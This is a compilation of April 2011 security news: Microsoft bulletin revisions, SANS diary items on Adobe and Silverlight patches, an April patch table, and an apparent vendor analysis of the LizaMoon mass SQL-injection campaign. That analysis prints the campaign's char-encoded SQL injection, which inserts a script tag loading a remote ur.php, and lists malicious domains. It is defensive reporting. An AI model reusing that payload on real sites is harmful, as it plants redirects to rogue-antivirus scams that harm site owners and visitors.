Chris Mosby at myITforum.com

********************************************************************

Title: Microsoft Security Bulletin Re-Releases

Issued: April 21, 2011

********************************************************************

Summary

=======

The following bulletins have undergone a major revision increment.

Please see the appropriate bulletin for more details.

  * MS11-025 - Important

Bulletin Information:

=====================

* MS11-025 - Important

 - http://www.microsoft.com/technet/security/bulletin/ms11-025.mspx

 - Reason for Revision: V2.0 (April 21, 2011): Rereleased bulletin

    to reoffer the updates to address a detection issue. There

    were no changes to the security update files in this

    bulletin. Customers who have already successfully updated

    their systems do not need to reinstall this update. 

 - Originally posted: April 12, 2011

 - Updated: April 21, 2011

 - Bulletin Severity Rating: Important

 - Version: 2.0

Adobe Reader and Acrobat Security Updates
Share |
Published: 2011-04-21,
Last Updated: 2011-04-21 17:41:20 UTC
by Guy Bruneau (Version: 1)
0 comment(s)

Adobe released important security updates for Adobe Reader X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh OS. The bulletin is posted here.

"CVE-2011-0611, is being actively exploited in the wild against both Adobe Flash Player, and Adobe Reader and Acrobat, as well as via a Flash (.swf) file embedded in a Microsoft Word (.doc) or Microsoft Excel (.xls) file delivered as an email attachment targeting the Windows platform. Adobe Reader X Protected Mode mitigations would prevent an exploit of this kind from executing."[1]


Affected software:

Adobe Reader X (10.0.1) and earlier versions for Windows
Adobe Reader X (10.0.2) and earlier versions for Macintosh
Adobe Acrobat X (10.0.2) and earlier versions for Windows and Macintosh

NOTE: Adobe Reader 9.x for UNIX, Adobe Reader for Android, and Adobe Reader and Acrobat 8.x are not affected by CVE-2011-0611.


[1] http://www.adobe.com/support/security/bulletins/apsb11-08.html

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu
Keywords: Acrobat Adobe Reader
0 comment(s)

Silverlight Update Available
Share |
Published: 2011-04-21,
Last Updated: 2011-04-21 17:26:09 UTC
by Guy Bruneau (Version: 2)
1 comment(s)

Microsoft has issued a security patch for Silverlight KB2526954. It fixes six issues. However, the Microsoft link to KB2526954 is still not live. If you have Microsoft update running, it is ready to install. This is rated as important and will auto install.

Direct download http://go.microsoft.com/fwlink/?LinkID=149156

Update 1: Microsoft bulletin is now posted here.

[1] http://www.microsoft.com/getsilverlight/Get-Started/Install/Default.aspx

[2] http://support.microsoft.com/kb/2526954


-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu
Keywords: KB2526954 Silverlight
1 comment(s)

MS11-020 (KB2508429) Upgrading from Critical to PATCH NOW

MS11-020 (KB2508429) Upgrading from Critical to PATCH NOW
Share |
Published: 2011-04-15,
Last Updated: 2011-04-15 12:22:18 UTC
by Kevin Liston (Version: 2)
1 comment(s)

Based on notifications received from Microsoft we are upgrading the rating of MS11-020 (KB 2508429, CVE-2011-0661) from Critical to PATCH NOW. See: http://isc.sans.edu/diary.html?storyid=10693 for the full table.

The Remote Code Exploit is possible without authentication, so this presents a serious risk to internal networks. Think Downadup/Conficker, or think lateral movement if that will help motivate patching.

Also note that this patch requires a reboot of your system.

Please submit any reports of weponization/exploits, or impacts from applying the patch.

Sorry.

-KL
Keywords: MS11020

********************************************************************

Title: Microsoft Security Bulletin Minor Revisions

Issued: April 13, 2011

********************************************************************

Summary

=======

The following bulletins have undergone a minor revision increment.

Please see the appropriate bulletin for more details.

  * MS11-019 - Critical

  * MS11-017 - Important

Bulletin Information:

=====================

* MS11-019 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms11-019.mspx

  - Reason for Revision: V1.1 (April 13, 2011): Clarified the

    vulnerability description in the Executive Summary. 

  - Originally posted: April 12, 2011

  - Updated: April 13, 2011

  - Bulletin Severity Rating: Critical

  - Version: 1.1

* MS11-017 - Important

  - http://www.microsoft.com/technet/security/bulletin/ms11-017.mspx

  - Reason for Revision: V1.3 (April 13, 2011): Corrected the

    bulletin replacement information for Remote Desktop

    Connection 6.0 Client on supported editions of Windows Server

    2003 and Remote Desktop Connection 6.1 Client on supported

    editions of Windows Vista. This is a bulletin change only.

    There were no changes to the detection or security update files. 

  - Originally posted: March 8, 2011

  - Updated: April 13, 2011

  - Bulletin Severity Rating: Important

  - Version: 1.3

Adobe updated its advisory, stating that we should have a patch at least for the "non sandbox" versions of Adobe Acrobat and Reader by April 25th [1]. Flash player will get a fix even earlier (April 15th = this week Friday). Adobe Reader X for Windows, which uses the new "Protected Mode" feature to limited the exploitability of this vulnerability, will have to wait until June 25th.

Little Table to clarify:

for more details, see the URL below.

[1] http://www.adobe.com/support/security/advisories/apsa11-02.html

------

Normal 0 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;}

********************************************************************

Title: Microsoft Security Bulletin Minor Revisions

Issued: April 12, 2011

********************************************************************

Summary

=======

The following bulletins have undergone a minor revision increment.

Please see the appropriate bulletin for more details.

  * MS11-025 - Important

  * MS10-088 - Important

  * MS10-087 - Critical

Bulletin Information:

=====================

* MS11-025 - Important

  - http://www.microsoft.com/technet/security/bulletin/ms11-025.mspx

  - Reason for Revision: V1.1 (April 12, 2011): Clarified the update

    FAQ, "I am a third-party application developer and I use

    Visual C++. How do I update my application?" 

  - Originally posted: April 12, 2011

  - Updated: April 12, 2011

  - Bulletin Severity Rating: Important

  - Version: 1.1

* MS10-088 - Important

  - http://www.microsoft.com/technet/security/bulletin/ms10-088.mspx

  - Reason for Revision: V1.3 (April 12, 2011): Announced that the

    security update for Microsoft Office 2004 for Mac (KB2505924)

    offered in MS11-021, MS11-022, and MS11-023 also addresses

    the vulnerabilities described in this security bulletin. 

  - Originally posted: November 9, 2010

  - Updated: April 12, 2011

  - Bulletin Severity Rating: Important

  - Version: 1.3

* MS10-087 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms10-087.mspx

  - Reason for Revision: V2.1 (April 12, 2011): Announced that the

    security update for Microsoft Office 2004 for Mac (KB2505924)

    offered in MS11-021, MS11-022, and MS11-023 also addresses

    the vulnerabilities described in this security bulletin. 

  - Originally posted: November 9, 2010

  - Updated: April 12, 2011

  - Bulletin Severity Rating: Critical

  - Version: 2.1

Normal 0 false false false EN-US X-NONE X-NONE /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} ********************************************************************

Title: Microsoft Security Advisory Notification

Issued: April 12, 2011

********************************************************************

 

Security Advisories Updated or Released Today ==============================================

 

 * Microsoft Security Advisory (973811)

  - Title: Extended Protection for Authentication

  - http://www.microsoft.com/technet/security/advisory/973811.mspx

  - Revision Note: V1.12 (April 12, 2011): Updated the FAQ with

    information about a non-security update enabling Microsoft

    Outlook to opt in to Extended Protection for Authentication.

 * Microsoft Security Advisory (2506014)

  - Title: Update for the Windows Operating System Loader

  - http://www.microsoft.com/technet/security/advisory/2506014.mspx

  - Revision Note: V1.0 (April 12, 2011): Advisory published.

 * Microsoft Security Advisory (2501696)

  - Title: Vulnerability in MHTML Could Allow

    Information Disclosure

  - http://www.microsoft.com/technet/security/advisory/2501696.mspx

  - Revision Note: V2.0 (April 12, 2011): Advisory updated to

    reflect publication of security bulletin.

 * Microsoft Security Advisory (2501584)

  - Title: Release of Microsoft Office File Validation

    for Microsoft Office

  - http://www.microsoft.com/technet/security/advisory/2501584.mspx

  - Revision Note: V1.0 (April 12, 2011): Advisory published.

 * Microsoft Security Advisory (2269637)

  - Title: Insecure Library Loading Could Allow Remote

    Code Execution

  - http://www.microsoft.com/technet/security/advisory/2269637.mspx

  - Revision Note: V7.0 (April 12, 2011): Added the following

    Microsoft Security Bulletins to the Updates relating to

    Insecure Library Loading section: MS11-023, "Vulnerabilities

    in Microsoft Office Could Allow Remote Code Execution;" and

    MS11-025, "Vulnerability in Microsoft Foundation Class (MFC)

    Library Could Allow Remote Code Execution."   

 

Here are the April 2011 Black Tuesday patches.  Enjoy!
 

Overview of the April 2011 Microsoft Patches and their status.
 

April 2011 Microsoft Black Tuesday Summary

Share |

Published: 2011-04-11,
Last Updated: 2011-04-12 17:40:19 UTC
by Jim Clausing (Version: 1)

0 comment(s)

Here are the April 2011 Black Tuesday patches.  Enjoy!
 

Overview of the April 2011 Microsoft Patches and their status.
 

#	Affected	Contra Indications	Known Exploits	Microsoft rating	ISC rating(*)
clients	servers
MS11-018	Cumulative Security Update for Internet Explorer ( Replaces MS11-003 )
Internet Explorer 6-8 CVE-2011-0094 CVE-2011-0346 CVE-2011-1244 CVE-2011-1245 CVE-2011-1345	KB 2497640	No Known Exploits.	Severity:Critical Exploitability: 1,1,?,3,1	Critical	Critical
MS11-019	Vulnerabilities in SMB Client Could Allow Remote Code Execution ( Replaces MS10-020 )
Windows CVE-2011-0654 CVE-2011-0660	KB 2511455	No Known Exploits.	Severity:Critical Exploitability: 2,1	Critical	Critical
MS11-020	Vulnerability in SMB Server Could Allow Remote Code Execution ( Replaces MS10-012 MS10-054 )
Windows CVE-2011-0661	KB 2508429	No Known Exploits.	Severity:Critical Exploitability: 1	Critical	Critical
MS11-021	Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution ( Replaces MS10-080 MS10-087 )
Office XP SP3-2010, Office 2004-2011 for Mac, Open XML File Format Converter, Excel Viewer SP2, Office Compatibility Pack for 2007 file formats CVE-2011-0097 CVE-2011-0098 CVE-2011-0101 CVE-2011-0103 CVE-2011-0104 CVE-2011-0105 CVE-2011-0978 CVE-2011-0979 CVE-2011-0980	KB 2489279	No Known Exploits.	Severity:Important Exploitability: 1,1,1,2,2,2,1,1,1	Important	Important
MS11-022	Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution ( Replaces MS09-017 MS10-036 MS10-087 MS10-088 )
PowerPoint CVE-2011-0655 CVE-2011-0656 CVE-2011-0976	KB 2489283	No Known Exploits.	Severity:Important Exploitability: 2,2,1	Important	Important
MS11-023	Vulnerabilities in Microsoft Office Could Allow Remote Code Execution ( Replaces MS10-087 )
Office XP - 2007, Office 2004 - 2008 for Mac, Open XML File Format Converter CVE-2011-0107 CVE-2011-0977	KB 2489293	POC Available.	Severity:Important Exploitability: 1,2	Important	Important
MS11-024	Vulnerability in Windows Fax Cover Page Editor Could Allow Remote Code Execution
Fax Services, Fax Server Role CVE-2010-3974	KB 2527308	POC Available.	Severity:Important Exploitability: 3	Critical	Important
MS11-025	Vulnerability in Microsoft Foundation Class (MFC) Library Could Allow Remote Code Execution
Visual Studio .NET 2003 - 2010, Visual C++ 2005 - 2010 Redistributable Package CVE-2010-3190	KB 2500212	No Known Exploits.	Severity:Important Exploitability: 1	Important	Important
MS11-026	Vulnerability in MHTML Could Allow Information Disclosure
MHTML CVE-2011-0096	KB 2503658	ACTIVELY EXPLOITED.	Severity:Important Exploitability: 3	PATCH NOW!	Important
MS11-027	Cumulative Security Update of ActiveX Kill Bits ( Replaces MS10-034 )
Windows XP- 7, Server 2003-2008 CVE-2010-0811 CVE-2010-3973 CVE-2011-1243	KB 2508272	POC Available.	Severity:Critical Exploitability: ?,?,?	Critical	Critical
MS11-028	Vulnerability in .NET Framework Could Allow Remote Code Execution ( Replaces MS09-061 MS10-060 MS10-077 )
.NET framework (all supported version) CVE-2010-3958	KB 2484015	No Known Exploits.	Severity:Critical Exploitability: 1	Critical	Critical
MS11-029	Vulnerability in GDI+ Could Allow Remote Code Execution ( Replaces MS09-062 MS10-087 )
Windows XP-Vista, Windows Server 2003-2008, Office XP CVE-2011-0041	KB 2489979	No Known Exploits.	Severity:Critical Exploitability: 1	Critical	Critical
MS11-030	Vulnerability in DNS Resolution Could Allow Remote Code Execution ( Replaces MS08-020 MS08-037 MS08-066 )
Windows XP - 7, Windows Server 2008 CVE-2011-0657	KB 2509553	No Known Exploits.	Severity:Critical Exploitability: 2	Critical	Critical
MS11-031	Vulnerability in JScript and VBScript Scripting Engines Could Allow Remote Code Execution ( Replaces MS09-045 MS10-022 MS11-009 )
OpenType Compact Font Format (CFF) driver CVE-2011-0663	KB 2514666	No Known Exploits.	Severity:Critical Exploitability: 2	Critical	Important
MS11-032	Vulnerability in the OpenType Compact Font Format (CFF) Driver Could Allow Remote Code Execution ( Replaces MS11-007 )
OpenType Compact Font Format (CFF) driver CVE-2011-0034	KB 2507618	No Known Exploits.	Severity:Critical Exploitability: 3	Critical	Important
MS11-033	Vulnerability in WordPad Text Converters Could Allow Remote Code Execution ( Replaces MS10-067 )
Microsoft Wordpad CVE-2011-0028	KB 2485663	No Known Exploits.	Severity:Important Exploitability: 1	Important	Important
MS11-034	Elevation of Privilege Vulnerabilities in Windows Kernel-Mode Drivers (Replaces MS10-012 )
Kernel Mode Drivers CVE-2011-0662 CVE-2011-0665 CVE-2011-0666 CVE-2011-0667 CVE-2011-0670 CVE-2011-0671 CVE-2011-0672 CVE-2011-0673 CVE-2011-0674 CVE-2011-0675 CVE-2011-0676 CVE-2011-0677 CVE-2011-1225 CVE-2011-1226 CVE-2011-1227 CVE-2011-1228 CVE-2011-1229 CVE-2011-1230 CVE-2011-1231 CVE-2011-1232 CVE-2011-1233 CVE-2011-1234 CVE-2011-1235 CVE-2011-1236 CVE-2011-1237 CVE-2011-1238 CVE-2011-1239 CVE-2011-1240 CVE-2011-1241 CVE-2011-1242	KB 2506223	.	Severity:Important Exploitability: 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,3,1,1,1,1	Important	Important

 

We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating

• We use 4 levels:
  • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
  • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
  • Important: Things where more testing and other measures can help.
  • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
• The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
• The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
• Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
• All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

Yet another Adobe Flash/Reader/Acrobat 0 day
Share |
Published: 2011-04-11,
Last Updated: 2011-04-11 22:33:13 UTC
by Johannes Ullrich (Version: 1)
5 comment(s)

Adobe released that a so far unpatched vulnerability has been used in recent targeted attacks.

Flash Player 10.2.153.1 is vulnerable, as is the flash player component used to execute flash in Adobe Reader / Acrobat. Adobe Reader X is vulnerable bu but not exploitable.

At this time, according to Adobe, the attack is performed using Flash files embedded in Word documents.

Note that Flash may be embedded in other Office document formats like Excel. Adobe is not planning on an out of band patch at this point, as Adobe Reader X is not exploitable.

[1] http://www.adobe.com/support/security/advisories/apsa11-02.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter
Keywords: adobe flash
5 comment(s)

The LizaMoon mass-injection campaign is still ongoing and more than 500,000 URLs have a script link to lizamoon.com according to Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a Google Search reveals over 1,500,000 URLs that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down.

Additional injected URLs

Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).

hxxp://lizamoon.com/ur.php
hxxp://tadygus.com/ur.php
hxxp://alexblane.com/ur.php
hxxp://alisa-carter.com/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://worid-of-books.com/ur.php
hxxp://google-server43.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://milapop.com/ur.php

The domain stats-master111.info was registered on October 21, 2010 which could mean the first attack happened then but we don't have any evidence of that. The first confirmed case that we know of is from December 2010, but we didn't make the connection to LizaMoon until today. The last domain, milapop.com, was registered today.

SQL Injection

We were able to find more information about the SQL Injection itself (thanks Peter) and the command is par for the course when it comes to SQL Injections. Here's one example:

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)
+as+varchar(8)))--

More information is available over on Stackoverflow.com.

Injected code

Here is the content of an example ur.php file. The content isn't even obfuscated which is somewhat unusual. All the code does is a redirect to a rogue AV site. We've seen the scripts change over time to redirect to several different rogue AV sites:

What happens to the user?

We wrote in an earlier post that the payload site doesn't work properly, but further testing shows that it does and we created a video showing what happens if a user visits a website that contains the injected code. The video is available at the end of this post. The user only gets the malicious code once per IP address, so if you've already visited the site you won't get the code again. This is something we see often in attacks, especially in exploit kits.

The Rogue AV software that is installed is called Windows Stability Center and the file that is downloaded is currently detected by 13/43 anti-virus engines according to VirusTotal.

The software then displays a warning that there are lots of problems on your PC. To fix them you have to pay for the full version of the application. Very traditional rogue AV scam. Dancho Danchev has some more information on his blog.

Where are users coming from?

We looked at reports of traffic to lizamoon.com as indicated by data collected by the Websense Threatseeker Network and here's a graph of where those users are located.

So what about iTunes?

We received blog comments from our readers (keep them coming, we read them all!) and some were critical of our use of iTunes in the title of the previous post and how we stated that iTunes URLs had been compromised, but the script neutered by Apple. All of what we stated was technically correct, but perhaps we didn't make it clear enough.

Every time there's a mass-injection like this, and there really hasn't been anything this big before, we try to identify larger systems and sites that have been affected to give some indication of how wide the attack has spread. And there are few systems out there bigger than iTunes, so when we saw that content on itunes.apple.com contained the injected link we wanted to make people aware of that, even if the script didn't work. It seems that some readers weren't too happy about that and argued that we could also say that Google Search was compromised because it also shows the injected code in search results. We don't really agree with that, but perhaps we shouldn't have highlighted it the way we did.

Questions & Answers about the LizaMoon mass-injection

Q: Why is this called LizaMoon?
A: The first domain we saw on March 29, 2011 was called lizamoon.com

Q: How many sites have been affected by this?
A: It's really hard to say. Google Search indicates it's over 1.5 million URLs but that number could be over-inflated. It's safe to say it's in the hundreds of thousands.

Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.

Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL databases. So far we have only had reports of Microsoft SQL Server 2003 and 2005 being affected, so if you have any information that says that 2008 has been hit as well, we'd like to know about it.

Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2003 and 2005?
A: We don't know, but we don't think so. Most likely there are vulnerabilities in the Web systems used by these sites, such as outdated CMS and blog systems.

Q: What happens when I visit a site that contains the injected script?
A: Your PC will get redirected to a rogue AV site, displaying fake information about your PC being infected.

Q: Will I get redirected over and over again if I visit a compromised site?
A: No, the script only redirects you once.

Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.